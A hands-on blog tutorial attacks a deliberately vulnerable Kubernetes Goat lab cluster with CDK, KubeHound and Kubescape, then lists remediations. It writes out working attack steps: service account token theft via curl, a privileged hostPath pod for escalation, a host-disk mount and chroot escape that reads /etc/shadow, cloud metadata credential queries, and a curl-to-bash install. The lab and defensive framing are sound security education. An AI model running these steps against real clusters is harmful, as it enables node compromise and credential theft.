Attacking Kubernetes: Offensive Recon and Attack Path Analysis with CDK, KubeHound, and Kubescape

Part 1 - Lab setup, attacker simulation, and finding exploitable misconfigurations


One of the best ways to improve Kubernetes security is to understand what an attacker actually does after getting into a cluster. Reading about it is one thing, but running through it hands-on in a lab environment makes the risks much more concrete. This post covers how I set up a local Kubernetes lab using WSL and Kind, and walked through the offensive side using CDK, KubeHound, and Kubescape.

Part 2 will cover the detection side with Falco, Tetragon, kube-bench, and Wazuh.

Tools Overview

Kubernetes Goat (GitHub) is a deliberately vulnerable Kubernetes environment built for learning attack and defense. It ships with around 20 attack scenarios covering privilege escalation, container escape, SSRF, secret exposure, and lateral movement. Think of it as DVWA for Kubernetes.

CDK (GitHub) is a zero-dependency container penetration toolkit designed to be dropped inside a compromised container. It is a single static binary that automatically enumerates the container environment, checks for escape vectors, and identifies accessible credentials and misconfigurations.

KubeHound (GitHub) is an attack path analysis tool built by Datadog's security research team. It ingests your cluster's state (RBAC, workloads, service accounts, network policies) and generates a graph of all viable attack paths. It answers questions like "which pod can reach cluster-admin in three hops?" and "what is the blast radius if this service account token is stolen?"

Kubescape (GitHub) is a CNCF security posture tool that scans your cluster against established frameworks including NSA-CISA Kubernetes Hardening Guidance, MITRE ATT&CK for Containers, and CIS Benchmarks. It scores findings and provides remediation guidance for each control.


Prerequisites

All of the following was set up inside WSL (Ubuntu 22.04) on Windows, with Docker Desktop (WSL2 backend), Kind, and kubectl already installed.

To verify Kind is working inside WSL:

kind version
kubectl version --client

Lab Setup

1. Kubernetes Goat on WSL with Kind

# Clone the repo
git clone https://github.com/madhuakula/kubernetes-goat.git
cd kubernetes-goat

# Create a Kind cluster
kind create cluster --name kubernetes-goat

# Confirm your context
kubectl config current-context
# Expected output: kind-kubernetes-goat

# Deploy Kubernetes Goat
bash setup-kubernetes-goat.sh

# Verify pods are running
kubectl get pods --all-namespaces

Once everything is up, port-forward the scenario guide to your browser:

bash access-kubernetes-goat.sh
# Opens at http://localhost:1234

The guide walks through each scenario. The ones most relevant to this post are:

  1. Sensitive keys in environment variables

  2. Docker-in-Docker (DinD) abuse

  3. SSRF to cloud metadata

  4. Privileged container escape

  5. Service account token abuse


2. CDK

CDK ships as a single static binary; there is nothing to install in the cluster. You download it once, then transfer it into a compromised container the way an attacker would.

Inside WSL, download the binary:

curl -L https://github.com/cdk-team/CDK/releases/latest/download/cdk_linux_amd64 -o cdk
chmod +x cdk

To copy it into a running pod:

kubectl cp ./cdk <namespace>/<pod-name>:/tmp/cdk
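
If the target container lacks tar (which kubectl cp depends on), streaming the binary over kubectl exec is a reliable fallback; a minimal sketch using the same placeholder names:

# Stream the binary over stdin and mark it executable
kubectl exec -i -n <namespace> <pod-name> -- sh -c 'cat > /tmp/cdk && chmod +x /tmp/cdk' < ./cdk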

3. KubeHound

KubeHound uses Docker Compose to run a local backend stack (a JanusGraph graph database plus its supporting services). Run it from within WSL with Docker Desktop's WSL2 integration active.

git clone https://github.com/DataDog/KubeHound.git
cd KubeHound

# Start the backend stack
docker compose -f deployments/kubehound/docker-compose.yaml up -d
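
# If kubectl is not already pointed at the Kind cluster, export its
# kubeconfig first (adjust the cluster name to match your setup)
kind export kubeconfig --name kubernetes-goat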

# Wait for services to be healthy, then run the ingestor
# KUBECONFIG should point to your Kind cluster
./bin/kubehound

Once ingestion completes, the KubeHound UI (Jupyter notebooks with pre-built attack path queries) is available at http://localhost:8888.


4. Kubescape

curl -s https://raw.githubusercontent.com/kubescape/kubescape/master/install.sh | /bin/bash

# Confirm installation
kubescape version

Simulating an Attacker Inside a Compromised Pod

For this walkthrough, I exec'd into one of the Kubernetes Goat pods to simulate what an attacker would do after gaining initial access to a container.

kubectl exec -it <pod-name> -n <namespace> -- /bin/bash

Step 1: CDK Evaluate

The first thing an attacker does is understand the environment. CDK's evaluate command runs automated recon in one shot:

/tmp/cdk evaluate

CDK checks for:

  • Container runtime (Docker, containerd, etc.)

  • Linux capabilities (CAP_SYS_ADMIN, CAP_NET_ADMIN, CAP_DAC_OVERRIDE, etc.)

  • Mounted paths (Docker socket, host filesystem mounts)

  • Kubernetes service account token presence and permissions

  • Cloud provider metadata endpoints (AWS IMDS, GCP metadata)

  • Reachability of the Kubernetes API server

  • Whether the container is running as root or with --privileged

  • Known CVEs (CVE-2019-5736 runc escape, CVE-2020-15257 containerd-shim, etc.)

A representative output on a privileged Kubernetes Goat container looks like this:

[  Information Gathering - System  ]
Container Runtime: containerd
Current User: root

[  Information Gathering - Services  ]
Kubernetes API: https://10.96.0.1:443 (reachable)
ServiceAccount Token: FOUND at /var/run/secrets/kubernetes.io/serviceaccount/token
Kubernetes Namespace: default

[  Information Gathering - Sensitive Files  ]
Possible K8s service account token: /var/run/secrets/kubernetes.io/serviceaccount/token

[  Exploit - Privileged Container  ]
[!] CAP_SYS_ADMIN detected. Host filesystem may be accessible.
[!] /host/etc found - host root may be mounted at /host

[  Available Exploits  ]
[+] cdk run --exploit mount-disk
[+] cdk run --exploit service-account-token-collector
[+] cdk run --exploit k8s-node-apiserver

The last block is where the attacker's next steps come from. CDK identifies exactly which exploits are viable given the current environment and prints them directly.


Step 2: Service Account Token Abuse

By default, Kubernetes mounts a service account token into every pod at /var/run/secrets/kubernetes.io/serviceaccount/token. This token carries whatever RBAC permissions have been granted to the associated service account. In many clusters (and across multiple Kubernetes Goat scenarios), those permissions are broader than intended.

CDK can collect and test the token automatically:

/tmp/cdk run --exploit service-account-token-collector

Or manually:

TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
APISERVER=https://10.96.0.1:443
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt

# List secrets in the default namespace
curl -s --cacert $CACERT \
  -H "Authorization: Bearer $TOKEN" \
  $APISERVER/api/v1/namespaces/default/secrets

# Attempt to list pods cluster-wide
curl -s --cacert $CACERT \
  -H "Authorization: Bearer $TOKEN" \
  $APISERVER/api/v1/pods
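
To enumerate the token's permissions wholesale instead of probing endpoint by endpoint, the SelfSubjectRulesReview API works with the same curl pattern (a sketch reusing the variables above; it returns every rule granted in the queried namespace):

# Ask the API server what this token is allowed to do in "default"
curl -s --cacert $CACERT \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -X POST $APISERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews \
  -d '{"kind":"SelfSubjectRulesReview","apiVersion":"authorization.k8s.io/v1","spec":{"namespace":"default"}}'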

In Kubernetes Goat, several service accounts can list secrets cluster-wide, create pods, or both. A service account that can create pods is particularly dangerous because it allows an attacker to schedule a new privileged pod, which is the next step toward node compromise.
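
To make that escalation concrete, here is a minimal sketch of the kind of privileged pod such a token could schedule (pod and container names are hypothetical):

kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: privesc-demo               # hypothetical
spec:
  containers:
  - name: shell
    image: alpine
    command: ["sleep", "infinity"]
    securityContext:
      privileged: true             # full host kernel access
    volumeMounts:
    - name: hostroot
      mountPath: /host             # host root filesystem inside the pod
  volumes:
  - name: hostroot
    hostPath:
      path: /
EOF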


Step 3: Privileged Container Escape

Kubernetes Goat Scenario 4 runs a container with securityContext.privileged: true and the host filesystem mounted. CDK detects this automatically and surfaces the exploit:

/tmp/cdk run --exploit mount-disk

This mounts the host's root disk device inside the container, then chroots into it to get a shell on the host OS. At that point you are no longer inside the container; you have root on the underlying Kubernetes node.
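
A quick way to confirm the container really is privileged before attempting this (a sketch; the exact mask varies by kernel version):

# All capability bits set (e.g. 000001ffffffffff on recent kernels)
# is typical of privileged: true
grep CapEff /proc/self/status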

Doing this manually to understand what is happening:

# Identify the host disk
fdisk -l

# Mount it
mkdir /tmp/hostfs
mount /dev/sda1 /tmp/hostfs

# Chroot into the host
chroot /tmp/hostfs /bin/bash

# You are now on the node
hostname
cat /etc/shadow

Step 4: Cloud Metadata Recon (SSRF via IMDS)

This step applies to cloud-hosted clusters, but is worth understanding since Kubernetes Goat includes an SSRF scenario that simulates it. In a real EKS or GKE cluster, the instance metadata service is reachable from pods unless explicitly blocked via network policy or IMDS hop-limit configuration.

# AWS IMDSv1 (no token required, which is the problem)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# GCP metadata
curl -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

CDK checks for metadata endpoint reachability automatically during evaluate, so attackers get this information without having to know the endpoint addresses in advance.
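
On AWS, the standard hardening is to require IMDSv2 and drop the hop limit to 1 so metadata responses cannot make the extra network hop back into a pod; a sketch (the instance ID is a placeholder):

# Require session tokens (IMDSv2) and limit responses to one hop
aws ec2 modify-instance-metadata-options \
  --instance-id i-0123456789abcdef0 \
  --http-tokens required \
  --http-put-response-hop-limit 1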


Mapping Attack Paths with KubeHound

Where CDK answers "what can I do from this pod right now", KubeHound answers "how does this pod connect to the rest of the cluster". After ingestion, open the Jupyter UI at http://localhost:8888. KubeHound ships with pre-built query notebooks.

Find all paths from any pod to cluster-admin:

g.V().hasLabel('Pod').repeat(
    outE().inV().simplePath()
).until(
    has('critical', true)
).path().by('name').by(label).limit(20).toList()

Find over-permissioned service accounts:

g.V().hasLabel('ServiceAccount')
  .where(outE('PERMISSION').inV().has('resource', 'secrets').has('scope', 'cluster'))
  .values('name').toList()

Find pods with direct escape paths to nodes:

g.V().hasLabel('Pod')
  .where(outE('EXPLOIT').inV().hasLabel('Node'))
  .values('name').toList()

The graph view makes attack chains navigable in a way that a flat list of findings does not. You can see the specific misconfiguration that serves as the pivot point at each hop, which directly informs remediation priority.

The attack paths that surfaced on my Kubernetes Goat setup:

  • Pod with list secrets permission on the cluster scope -> retrieve a second service account token -> that token has create pods -> deploy a privileged pod -> node escape

  • Privileged container with hostPath mount -> node access -> read kubelet credentials -> API server access as a node identity

  • Default namespace service account -> get/list pods cluster-wide -> identify pods with mounted secrets -> targeted credential theft


Running Kubescape

Run Kubescape against the live Kubernetes Goat cluster to see the misconfigurations mapped to security frameworks.

Scan against the NSA-CISA framework:

kubescape scan framework nsa --kubeconfig ~/.kube/config

Scan against MITRE ATT&CK for Containers:

kubescape scan framework mitre --kubeconfig ~/.kube/config

Full scan across all frameworks, output to JSON:

kubescape scan --enable-host-scan -v \
  --format json \
  --output kubescape-results.json

Scope to specific namespaces:

kubescape scan --include-namespaces default,kube-system

Key Findings and How Attackers Leverage Them

The following are the findings Kubescape surfaces on a fresh Kubernetes Goat cluster, with the direct attacker path each one enables.

Automounted service account tokens in all pods

Framework: NSA-CISA / MITRE T1552.007 (Unsecured Credentials: Container API)

Every pod gets a service account token mounted by default unless automountServiceAccountToken: false is explicitly set on the service account or in the pod spec. Combined with over-permissive RBAC, this is one of the most common paths to cluster-wide access.

Attacker path: Exec into any pod -> read the token -> query the API server -> enumerate or escalate depending on what RBAC the service account has.

Fix: Set automountServiceAccountToken: false on the service account or in the pod spec for any workload that does not need API access.
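
A minimal sketch of the fix applied at the service account level (the account name is hypothetical):

kubectl apply -f - <<'EOF'
apiVersion: v1
kind: ServiceAccount
metadata:
  name: no-api-access        # hypothetical SA for workloads that never call the API
  namespace: default
automountServiceAccountToken: false
EOF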


Privileged containers

Framework: NSA-CISA / MITRE T1611 (Escape to Host)

Containers running with securityContext.privileged: true have full access to the host kernel's features. Combined with a hostPath mount or direct access to a block device, this is a straightforward container escape.

Attacker path: Shell in container -> mount host disk -> chroot to host OS -> root on the node.

Fix: Pod Security Admission (PSA) with the restricted or baseline profile enforces at admission time and blocks privileged containers from being scheduled.
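
With PSA, enforcement is a namespace label; for example, on the default namespace:

kubectl label namespace default \
  pod-security.kubernetes.io/enforce=restricted \
  pod-security.kubernetes.io/enforce-version=latest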


No Network Policies defined

Framework: NSA-CISA

With no NetworkPolicy resources in the cluster, every pod can communicate with every other pod across all namespaces. There is no lateral movement barrier.

Attacker path: Compromised pod in default namespace -> reach pods in kube-system -> access monitoring agents, internal APIs, or services with elevated permissions.

Fix: Default-deny NetworkPolicy per namespace with explicit ingress/egress rules for each workload.
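
A minimal default-deny sketch for one namespace (explicit allow rules per workload would follow; note that enforcement depends on the CNI, and Kind's default CNI has historically not enforced NetworkPolicy):

kubectl apply -f - <<'EOF'
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: default
spec:
  podSelector: {}          # selects every pod in the namespace
  policyTypes:
  - Ingress
  - Egress
EOF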


Secrets exposed as environment variables

Framework: MITRE T1552 (Unsecured Credentials)

Kubernetes Goat Scenario 1 deliberately stores credentials as environment variables. CDK's evaluate command prints all environment variables, so this information is available to an attacker within seconds of landing in the container. The same data is also visible in kubectl describe pod to anyone with pod read access.

Attacker path: CDK evaluate -> environment variables printed -> credentials harvested immediately.

Fix: Mount secrets as files from Kubernetes Secrets objects rather than injecting them as environment variables. Better still, use an external secrets manager with short-lived credentials (AWS Secrets Manager, HashiCorp Vault, Azure Key Vault).
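
A sketch of the file-mount pattern (pod and Secret names are hypothetical):

kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: app-demo                    # hypothetical
spec:
  containers:
  - name: app
    image: alpine
    command: ["sleep", "infinity"]
    volumeMounts:
    - name: creds
      mountPath: /etc/creds         # credentials appear as files, not env vars
      readOnly: true
  volumes:
  - name: creds
    secret:
      secretName: app-credentials   # hypothetical Secret object
EOF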


Host PID or Host Network namespace sharing

Framework: MITRE T1543 (Create or Modify System Process)

Pods with hostPID: true can see and signal all processes running on the host. Pods with hostNetwork: true bind to the node's network interfaces and bypass all Kubernetes-level network policies.

Attacker path (hostPID): View host process list -> ptrace or signal processes -> credential theft from process memory.

Attacker path (hostNetwork): Bypass pod-level network isolation -> directly reach cluster-internal services that are otherwise firewalled from the pod network.

Fix: Pod Security Admission's baseline and restricted profiles both disallow host namespace sharing, blocking hostPID and hostNetwork pods at admission time.


No resource limits on pods

Framework: NSA-CISA

Less obviously offensive, but the absence of CPU or memory limits means an attacker can run high-intensity workloads (cryptomining, brute force) without tripping resource-based anomaly detection. It also makes abnormal compute usage harder to spot during an incident.
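
A per-namespace LimitRange is the usual baseline fix, giving every container default requests and limits; a minimal sketch:

kubectl apply -f - <<'EOF'
apiVersion: v1
kind: LimitRange
metadata:
  name: default-limits
  namespace: default
spec:
  limits:
  - type: Container
    default:               # applied as the limit when none is set
      cpu: 500m
      memory: 256Mi
    defaultRequest:        # applied as the request when none is set
      cpu: 100m
      memory: 128Mi
EOF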


Putting It All Together

Running through this lab end to end, the picture that emerges is consistent with what we see in real cloud environments. Initial access to a single pod, combined with a handful of common misconfigurations, creates a realistic path to cluster-admin or node compromise without needing any CVE exploitation at all.

CDK makes the attacker's first few minutes very fast. Within 30 seconds of landing in a container, evaluate surfaces service account tokens, escape vectors, and cloud metadata reachability. KubeHound then shows you how those individual issues connect into multi-hop attack chains. Kubescape maps all of it to framework controls with risk scores.

The value of running this locally is not just understanding the individual tools. It is seeing how misconfigurations that seem low-risk in isolation (a service account with list permissions, a container without resource limits) combine into something much more serious.


What is Coming in Part 2

Now that the attacker's activity at each stage is clear, Part 2 covers how to detect it.

Falco for runtime detection of exactly the behavior CDK produces: unexpected binary execution inside containers, service account token reads, unusual mount syscalls, and API server calls that match enumeration patterns.

Tetragon for eBPF-based enforcement at the syscall level. Unlike Falco, Tetragon can terminate the offending process in-kernel, not just alert on it.

kube-bench for CIS Benchmark scanning at the node and control plane level, complementing the workload-level findings from Kubescape with node configuration checks.

Wazuh for SIEM integration. Pulling Kubernetes audit logs, Falco alerts, and node-level logs into Wazuh to build correlation rules that connect the individual signals into a detection pipeline.

The goal for Part 2 is that every attacker step described in this post has a corresponding detection signal and a clear log source.

